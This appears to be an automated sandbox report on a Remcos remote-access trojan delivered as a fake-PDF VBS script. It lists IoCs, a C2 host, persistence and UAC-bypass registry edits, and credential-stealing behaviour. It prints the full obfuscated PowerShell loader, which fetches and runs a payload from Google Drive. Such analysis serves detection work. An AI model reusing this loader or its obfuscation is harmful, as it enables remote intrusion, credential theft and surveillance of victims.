remcos | 05f8fb9335954bb1069a2dd6dbbf5ba8c605e3923c3ed0c974f95cd62fd10b67

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-12-2024 10:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

328835_140264_1·pdf.vbs
Size

33KB
MD5

a9636ba5124550a3c145fef91fa5489d
SHA1

f3ab90b16fef6a323c1a4eb44aa47acecdac3ca6
SHA256

146882bf4a0d47c6db66dacbc5e283a85097a8320cf653641d380ebeab6c4c10
SHA512

9b004cbdd4d35d7dd7038efd8e002b7022e1e6e9c3207535934f362c8e3a45e23ebe87ec1de5f7c37ff8f6afdbe7fc5deb5baa56957ba365abc8dae8a7fce7fa
SSDEEP

768:+fZasQ6lMFJfJc4PCPPNngWWshZBTYRikWbVVw4OrxBX:eZasOFfXiPeWWs/BYse4OXX

Score

10^/10

remcos remotehost collection credential_access discovery evasion execution persistence rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

8766e34g8.duckdns.org:3782

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-93TSMD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

Processes:

resource	yara_rule
behavioral2/memory/2956-90-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/924-87-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/2336-89-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/924-87-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/2956-90-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	Process
3	2364	WScript.exe
9	444	powershell.exe
15	444	powershell.exe
26	3208	msiexec.exe
28	3208	msiexec.exe
30	3208	msiexec.exe
32	3208	msiexec.exe
34	3208	msiexec.exe
46	3208	msiexec.exe
49	3208	msiexec.exe
50	3208	msiexec.exe
51	3208	msiexec.exe
53	3208	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

Processes:

Chrome.exeChrome.exemsedge.exemsedge.exemsedge.exeChrome.exeChrome.exemsedge.exemsedge.exe

pid	Process
2408	Chrome.exe
1712	Chrome.exe
4336	msedge.exe
2124	msedge.exe
388	msedge.exe
3436	Chrome.exe
3192	Chrome.exe
4984	msedge.exe
4300	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

msiexec.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Milliammetres% -windowstyle 1 $Chevise=(gp -Path 'HKCU:\\Software\\Scarfpins\\').Hospitious24;%Milliammetres% ($Chevise)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
444	powershell.exe
5060	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
26	drive.google.com
8	drive.google.com
9	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid	Process
3208	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
5060	powershell.exe
3208	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

msiexec.exe

description	pid	Process	procid_target
PID 3208 set thread context of 2956	3208	msiexec.exe	105
PID 3208 set thread context of 924	3208	msiexec.exe	106
PID 3208 set thread context of 2336	3208	msiexec.exe	107

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exereg.exereg.exemsiexec.exepowershell.exemsiexec.execmd.exemsiexec.exemsiexec.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Chrome.exemsedge.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exe

pid	Process
4160	reg.exe
3428	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsiexec.exemsiexec.exemsiexec.exeChrome.exe

pid	Process
444	powershell.exe
444	powershell.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
2336	msiexec.exe
2336	msiexec.exe
3208	msiexec.exe
2956	msiexec.exe
2956	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
2408	Chrome.exe
2408	Chrome.exe
3208	msiexec.exe
3208	msiexec.exe
2956	msiexec.exe
2956	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
5060	powershell.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe
3208	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid	Process
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe
4984	msedge.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exe

description	pid	Process
Token: SeDebugPrivilege	444	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	2336	msiexec.exe
Token: SeShutdownPrivilege	2408	Chrome.exe
Token: SeCreatePagefilePrivilege	2408	Chrome.exe
Token: SeShutdownPrivilege	2408	Chrome.exe
Token: SeCreatePagefilePrivilege	2408	Chrome.exe
Token: SeShutdownPrivilege	2408	Chrome.exe
Token: SeCreatePagefilePrivilege	2408	Chrome.exe
Token: SeShutdownPrivilege	2408	Chrome.exe
Token: SeCreatePagefilePrivilege	2408	Chrome.exe
Token: SeShutdownPrivilege	2408	Chrome.exe
Token: SeCreatePagefilePrivilege	2408	Chrome.exe
Token: SeShutdownPrivilege	2408	Chrome.exe
Token: SeCreatePagefilePrivilege	2408	Chrome.exe
Token: SeShutdownPrivilege	2408	Chrome.exe
Token: SeCreatePagefilePrivilege	2408	Chrome.exe
Token: SeShutdownPrivilege	2408	Chrome.exe
Token: SeCreatePagefilePrivilege	2408	Chrome.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

Chrome.exemsedge.exe

pid	Process
2408	Chrome.exe
2408	Chrome.exe
4984	msedge.exe
4984	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

msiexec.exe

pid	Process
3208	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.execmd.exeChrome.exe

description	pid	Process	procid_target
PID 2364 wrote to memory of 444	2364	WScript.exe	82
PID 2364 wrote to memory of 444	2364	WScript.exe	82
PID 5060 wrote to memory of 3208	5060	powershell.exe	93
PID 5060 wrote to memory of 3208	5060	powershell.exe	93
PID 5060 wrote to memory of 3208	5060	powershell.exe	93
PID 5060 wrote to memory of 3208	5060	powershell.exe	93
PID 3208 wrote to memory of 1136	3208	msiexec.exe	94
PID 3208 wrote to memory of 1136	3208	msiexec.exe	94
PID 3208 wrote to memory of 1136	3208	msiexec.exe	94
PID 1136 wrote to memory of 4160	1136	cmd.exe	96
PID 1136 wrote to memory of 4160	1136	cmd.exe	96
PID 1136 wrote to memory of 4160	1136	cmd.exe	96
PID 3208 wrote to memory of 3084	3208	msiexec.exe	98
PID 3208 wrote to memory of 3084	3208	msiexec.exe	98
PID 3208 wrote to memory of 3084	3208	msiexec.exe	98
PID 3084 wrote to memory of 3428	3084	cmd.exe	100
PID 3084 wrote to memory of 3428	3084	cmd.exe	100
PID 3084 wrote to memory of 3428	3084	cmd.exe	100
PID 3208 wrote to memory of 2408	3208	msiexec.exe	102
PID 3208 wrote to memory of 2408	3208	msiexec.exe	102
PID 2408 wrote to memory of 3548	2408	Chrome.exe	103
PID 2408 wrote to memory of 3548	2408	Chrome.exe	103
PID 3208 wrote to memory of 2360	3208	msiexec.exe	104
PID 3208 wrote to memory of 2360	3208	msiexec.exe	104
PID 3208 wrote to memory of 2360	3208	msiexec.exe	104
PID 3208 wrote to memory of 2956	3208	msiexec.exe	105
PID 3208 wrote to memory of 2956	3208	msiexec.exe	105
PID 3208 wrote to memory of 2956	3208	msiexec.exe	105
PID 3208 wrote to memory of 2956	3208	msiexec.exe	105
PID 3208 wrote to memory of 924	3208	msiexec.exe	106
PID 3208 wrote to memory of 924	3208	msiexec.exe	106
PID 3208 wrote to memory of 924	3208	msiexec.exe	106
PID 3208 wrote to memory of 924	3208	msiexec.exe	106
PID 3208 wrote to memory of 2336	3208	msiexec.exe	107
PID 3208 wrote to memory of 2336	3208	msiexec.exe	107
PID 3208 wrote to memory of 2336	3208	msiexec.exe	107
PID 3208 wrote to memory of 2336	3208	msiexec.exe	107
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108
PID 2408 wrote to memory of 4512	2408	Chrome.exe	108

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\328835_140264_1·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Holbrook='Baalpladserne160';;$Peptonise='Kileskriften';;$Scenarioteknikken210='Deponerendes65';;$Aktieavancebeskatningerne='Bibabudukke';;$Oenanthylate=$host.Name;function Stainer($Cubitopalmar){If ($Oenanthylate) {$setout=4} for ($Standishes=$setout;;$Standishes+=5){if(!$Cubitopalmar[$Standishes]) { break };$Snappende+=$Cubitopalmar[$Standishes];$Ungdommens='Islandman140'}$Snappende}function Anholdelsens($Subdruid){ .($Udslyngning) ($Subdruid)}$Conakry=Stainer 'UncaNUnbueSc rT Tor. enW';$Conakry+=Stainer 'El,eEFirmb MarCLeonlChurIT,xiePepsN GulT';$Trykkested=Stainer 'P tuM SproE hizSpa i Fe l rgalVo,ta,reo/';$Siouxs=Stainer 'QereT Hj lBinosUntw1Wars2';$Rrggets='Od.o[ FrenEkebePrinTS.ag.OverSSlv eToolrBankv ispiOpl CPhraeL unP neuoInt iVatenBad.TLuf.M CitaStogn SubaSemigCh peSan RUnfo]Re,u:Is.g:Sp eS SobES emC SaluW serTe pI tvlTBag,Y onspCurtr,deroGullT esuO My.CFo.fOBygglSubt=Urim$ lassForsI Tr.oDo buGrovx fors';$Trykkested+=Stainer ' .re5Mrkh.Gold0De,i Atte(CompWUngpiRhumn vedRekooSkulwSponsSign OprrNPeleT Dra sluf1 Col0 aro.Bri 0A ti;e vi ,kydWGingiGarnnB un6Arbe4Jet.; Bla Pol xMate6Embr4Paho; nt Ur,srgalav Ran:Nonp1Fa i3Sa t1Harb.Ch o0 ata)Pust lecGCi,neMicrc BrakDepoo ear/Past2belt0Slsk1Hil 0Tran0Vand1Aggr0 Hit1S il SvejF acci itsrDiskeGridfUnwooTel xskra/Flea1Ster3Fiss1Undl.Skov0';$Standishesntonationer166=Stainer 'kn gUKvinsOmkoEElecRopma-bygnaNonug O tEHyp nConst';$Chemurgically=Stainer 'garth.evitSupetOmn pIntesDagp:Tran/ arr/Halsd L grBa li adivUnlie Acc. TaxgKantoMoisoIsatgMolelKakie Pre.Hallc alroAccom Zoo/ Sucu A ac Cat?GruneWintxClubpharmoClo rFordt F.s=Nonmdglado DiawFinenspatl,ndeoRadiaDecad plf&TilsiShindalm =Proc1Foto-Del VSprusTaliW Funjve,t8NonaRFla mUnm,bvoluHS.lbmCalvD HemMthttETrayA ra- Be O StaS ngyl,lasMKongb erm7Ch r8UbrugB.haBKlnilRedeWWinzZSp.oK ortCInstQ Sera';$Undubiousness=Stainer ' Sup>';$Udslyngning=Stainer ' FasiannoeB rdX';$overhringernes='Opsummeret';$situates='\Svrmens.Jag';Anholdelsens (Stainer 'Alme$ElemgRvr,L Pe o DowbkronABlokLRege:Incot jaleAppeRStormEmbaaLaboGChama dapNOve,TCupe=Sttt$ oneELandnSpi,V jvn: roeAGo,sPBystP Hy.dNurlAAutotInfaARamb+Brai$SamlSBulgiOpveTPremu AfsAsatiTMecheLam.S');Anholdelsens (Stainer 'Okta$La.rGUtaaL ,ulO SmebWannaKirkL Pe : disaaasmFFerrTMi.aEBlgerForfDBedmeSkaaaTagvtForkhRkeb=Unop$RappC A tH DenETa km subU LanRa.rogAlabIAltrCProfAKeralArg LBry,y Alt.Monos Ep,pKapplBombIB liTReb ( uc$ trauCastNBlandUbevU TilbInteIF nwO DgnUTennsHumbNSanseQuadskemiSKate)');Anholdelsens (Stainer $Rrggets);$Chemurgically=$Afterdeath[0];$Disorganize=(Stainer 'Deb $FrelgHulklA tiOSkytb KotaGeoeL Mut:CalaFMinei,haggCon.UhindrJol.a ,ngNAviaTQuodeMidtrPr.nnMateEShebs Tud=J,ggnHat.eKompwUd.y-D saoA tebMargJSk leLuftcHosptIc n rtesBr,cY.orksMicrTOrieePerfM,rbe.Rets$T.eacT ikoBetjnM,ssaBa,kk StarVuptY');Anholdelsens ($Disorganize);Anholdelsens (Stainer 'Dose$StosfJouri vingFretuSydar rbiaNuttnB wet Un.eRavirTelenHilleDyr,sStre.Mi lHOvereUnpraXyledSki,eG nor rmrs Und[Tesk$IlluSnsthteguea tann TindMuniiC,yps TrahGurieHardsPlo n A.tt Eiko Baan ryaz,brtUtaaiR froConsnBlaceUnmirBo r1 id6Serp6 en]P,ne=Alic$Kem TKinerBladyF.jekUn rk SkieGruns,niotSubseCompd');$Barrerne=Stainer 'En.o$TantfMonoi ribgXantuprocrEfteaBrnenHougt deeeUhusr Tw nFiksedecisGy o.StavDSkumoBogsw ArenAp.rl tomo laaA sedDrnnFPimpiTil lHnepe Dre(Undi$ redC .aphGulaeIndmmPdiauO tpr Ridg HaeiSin cReleaLa nl H plFireyBhut,Lang$p aeS O ek I dySh itPlant Gr,eWamplLnsle F lnInfu)';$Skyttelen=$Termagant;Anholdelsens (Stainer 'Land$ maggNynnl DatOPer.BFedeASphilMand:B syi ArgDAlcoeSi,ekAgeraForbTUv,daAdopLKiggOHydrG,ntieUnd,R PronNe.fESc lsHoli=pola(AcipTBro.Eov rsIndsTMid,- Va,P StraPrlatHerohAppl Moni$VitiSBuxoKC muy PertDryptOplgeDirkL Sh eOut n .as)');while (!$Idekatalogernes) {Anholdelsens (Stainer 'Eleg$Sherg KaplFr io Ep bVideaSynslhv d:MallKFremaid opFasti Bl t CriaRan,lKompeLaven UngsRapi= Qui$InveF cy oS ilrHuleePleupPrepif,leeCouncbuste') ;Anholdelsens $Barrerne;Anholdelsens (Stainer 'OffssBradT borA fi rGlistR ts-s avSBlodl udge hinEP laPBrid Husd4');Anholdelsens (Stainer 'Unst$ S,hg I nLTrigOPyrrB PunaUdlnlAfgr: elsiDauddgavleMagnk ianaUnivTa,deaPostLUnd,oskinG TekE Pi.rnonpnLastE U,psUdd,= S r(Ple.TKiloERejeSYdeltAute- OvepWooda,asatSme.H For Budg$HalsSFl xk forYTublt vrit SinEFornLM zzePorcnThre)') ;Anholdelsens (Stainer 'Bode$OriegSandlGtebO S abFuscASognlGe n: m rBPlauRHelliU.isD ParaHarrlCon LVilkyMund= Urd$FondgNiddlThyroGennbDingaSotelHor :EnerTRemaa Trarb.caMAvgue symnPork+Pure+Repe% Sph$FugeAErnrfVerot .riecarrRAmatDrumoE,preAMopetPlayh So .,angcOpgaOStoru UdsNKa at') ;$Chemurgically=$Afterdeath[$Bridally]}$Amenance=331516;$Overhunt=31171;Anholdelsens (Stainer 'Desa$ElmiGMoneL KrooSka b DyrAE itLcave: ourhte poVisiuGangpP,ste oolTimeA UndN ChadSpliETrun Flay=Admi Dit,G ,ore PleTSmit-Sve cArraOAnlgnUdvktretseU deNunpatStru Halm$KoloSBeblk nkuYBranTfingt rolE Sh lGingEDainn');Anholdelsens (Stainer 'Bo i$Ul,gg,krulAfveoEnerb B ra asal The:Ch rD acre upel ivkUnderRkene .akdWh.aeDiplr ndeeLouekFor,o Bi.nJ sktS.raoBygn afst= Sta lad[AfspSAfviyRespsSkostPrtee Na mPre .BadeC Daao artnSagsvBerteEcclr Uddt Tre]Tiaa:Grom:PomeFsmitr Volo affmAn iBm,rta strsBog.eMask6.taa4ButaSPrect tjerSam iBulknD shgtung(Lall$ erHNo foValguFi.mpCo,deOverlM laaPeltn KahdPaate.nim)');Anholdelsens (Stainer 'nonr$amfog Hy lOpspo RodBBjeraPretlUnif:K ipi lasnSpastBarlrUdkoO ,enJBor,e Op CTranTBifaESalodHypn eme= ar tar[KorsS G yy RenSLillTIhphe BodmB,id.UdputNo iEJetmX,ndeTRemb.ForhEBolsN MinCCarro omgdUdprIFyrinGa dGNett]Skri:Tll : prea ReeSDortc FjtISkimi Het.Pewtg TraEAvantPhotsDe iTpr,lR TusiTeneNTwadgFaun(Mari$resudKvasESpirL bsKClydrKrvoe ankdTradE,nliRDiabeSektKRgn.OXenoNBiciTPa oOExud)');Anholdelsens (Stainer ' pre$Hel gM teLBe.hoBegabNebrAOrchLAbu.: rkpu P,eNVianfMineAFai.M OceIa maLYawpiIse AdislRSkabL OrdYEle.=univ$InseiViziNWortTMenuRRaveOQ,eajAnnoE kogc SpaTLinee PaaDBtte. aanSKundUPardbMe asRhe Ts udrPalaINeosn htaG N n(Prof$Du dA R lm releErytN nadA SurNPol,CDeteeSt c,Clou$ WomoMonivweinE,nakRObskHFa eUpid.n Ch,tTale)');Anholdelsens $Unfamiliarly;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Holbrook='Baalpladserne160';;$Peptonise='Kileskriften';;$Scenarioteknikken210='Deponerendes65';;$Aktieavancebeskatningerne='Bibabudukke';;$Oenanthylate=$host.Name;function Stainer($Cubitopalmar){If ($Oenanthylate) {$setout=4} for ($Standishes=$setout;;$Standishes+=5){if(!$Cubitopalmar[$Standishes]) { break };$Snappende+=$Cubitopalmar[$Standishes];$Ungdommens='Islandman140'}$Snappende}function Anholdelsens($Subdruid){ .($Udslyngning) ($Subdruid)}$Conakry=Stainer 'UncaNUnbueSc rT Tor. enW';$Conakry+=Stainer 'El,eEFirmb MarCLeonlChurIT,xiePepsN GulT';$Trykkested=Stainer 'P tuM SproE hizSpa i Fe l rgalVo,ta,reo/';$Siouxs=Stainer 'QereT Hj lBinosUntw1Wars2';$Rrggets='Od.o[ FrenEkebePrinTS.ag.OverSSlv eToolrBankv ispiOpl CPhraeL unP neuoInt iVatenBad.TLuf.M CitaStogn SubaSemigCh peSan RUnfo]Re,u:Is.g:Sp eS SobES emC SaluW serTe pI tvlTBag,Y onspCurtr,deroGullT esuO My.CFo.fOBygglSubt=Urim$ lassForsI Tr.oDo buGrovx fors';$Trykkested+=Stainer ' .re5Mrkh.Gold0De,i Atte(CompWUngpiRhumn vedRekooSkulwSponsSign OprrNPeleT Dra sluf1 Col0 aro.Bri 0A ti;e vi ,kydWGingiGarnnB un6Arbe4Jet.; Bla Pol xMate6Embr4Paho; nt Ur,srgalav Ran:Nonp1Fa i3Sa t1Harb.Ch o0 ata)Pust lecGCi,neMicrc BrakDepoo ear/Past2belt0Slsk1Hil 0Tran0Vand1Aggr0 Hit1S il SvejF acci itsrDiskeGridfUnwooTel xskra/Flea1Ster3Fiss1Undl.Skov0';$Standishesntonationer166=Stainer 'kn gUKvinsOmkoEElecRopma-bygnaNonug O tEHyp nConst';$Chemurgically=Stainer 'garth.evitSupetOmn pIntesDagp:Tran/ arr/Halsd L grBa li adivUnlie Acc. TaxgKantoMoisoIsatgMolelKakie Pre.Hallc alroAccom Zoo/ Sucu A ac Cat?GruneWintxClubpharmoClo rFordt F.s=Nonmdglado DiawFinenspatl,ndeoRadiaDecad plf&TilsiShindalm =Proc1Foto-Del VSprusTaliW Funjve,t8NonaRFla mUnm,bvoluHS.lbmCalvD HemMthttETrayA ra- Be O StaS ngyl,lasMKongb erm7Ch r8UbrugB.haBKlnilRedeWWinzZSp.oK ortCInstQ Sera';$Undubiousness=Stainer ' Sup>';$Udslyngning=Stainer ' FasiannoeB rdX';$overhringernes='Opsummeret';$situates='\Svrmens.Jag';Anholdelsens (Stainer 'Alme$ElemgRvr,L Pe o DowbkronABlokLRege:Incot jaleAppeRStormEmbaaLaboGChama dapNOve,TCupe=Sttt$ oneELandnSpi,V jvn: roeAGo,sPBystP Hy.dNurlAAutotInfaARamb+Brai$SamlSBulgiOpveTPremu AfsAsatiTMecheLam.S');Anholdelsens (Stainer 'Okta$La.rGUtaaL ,ulO SmebWannaKirkL Pe : disaaasmFFerrTMi.aEBlgerForfDBedmeSkaaaTagvtForkhRkeb=Unop$RappC A tH DenETa km subU LanRa.rogAlabIAltrCProfAKeralArg LBry,y Alt.Monos Ep,pKapplBombIB liTReb ( uc$ trauCastNBlandUbevU TilbInteIF nwO DgnUTennsHumbNSanseQuadskemiSKate)');Anholdelsens (Stainer $Rrggets);$Chemurgically=$Afterdeath[0];$Disorganize=(Stainer 'Deb $FrelgHulklA tiOSkytb KotaGeoeL Mut:CalaFMinei,haggCon.UhindrJol.a ,ngNAviaTQuodeMidtrPr.nnMateEShebs Tud=J,ggnHat.eKompwUd.y-D saoA tebMargJSk leLuftcHosptIc n rtesBr,cY.orksMicrTOrieePerfM,rbe.Rets$T.eacT ikoBetjnM,ssaBa,kk StarVuptY');Anholdelsens ($Disorganize);Anholdelsens (Stainer 'Dose$StosfJouri vingFretuSydar rbiaNuttnB wet Un.eRavirTelenHilleDyr,sStre.Mi lHOvereUnpraXyledSki,eG nor rmrs Und[Tesk$IlluSnsthteguea tann TindMuniiC,yps TrahGurieHardsPlo n A.tt Eiko Baan ryaz,brtUtaaiR froConsnBlaceUnmirBo r1 id6Serp6 en]P,ne=Alic$Kem TKinerBladyF.jekUn rk SkieGruns,niotSubseCompd');$Barrerne=Stainer 'En.o$TantfMonoi ribgXantuprocrEfteaBrnenHougt deeeUhusr Tw nFiksedecisGy o.StavDSkumoBogsw ArenAp.rl tomo laaA sedDrnnFPimpiTil lHnepe Dre(Undi$ redC .aphGulaeIndmmPdiauO tpr Ridg HaeiSin cReleaLa nl H plFireyBhut,Lang$p aeS O ek I dySh itPlant Gr,eWamplLnsle F lnInfu)';$Skyttelen=$Termagant;Anholdelsens (Stainer 'Land$ maggNynnl DatOPer.BFedeASphilMand:B syi ArgDAlcoeSi,ekAgeraForbTUv,daAdopLKiggOHydrG,ntieUnd,R PronNe.fESc lsHoli=pola(AcipTBro.Eov rsIndsTMid,- Va,P StraPrlatHerohAppl Moni$VitiSBuxoKC muy PertDryptOplgeDirkL Sh eOut n .as)');while (!$Idekatalogernes) {Anholdelsens (Stainer 'Eleg$Sherg KaplFr io Ep bVideaSynslhv d:MallKFremaid opFasti Bl t CriaRan,lKompeLaven UngsRapi= Qui$InveF cy oS ilrHuleePleupPrepif,leeCouncbuste') 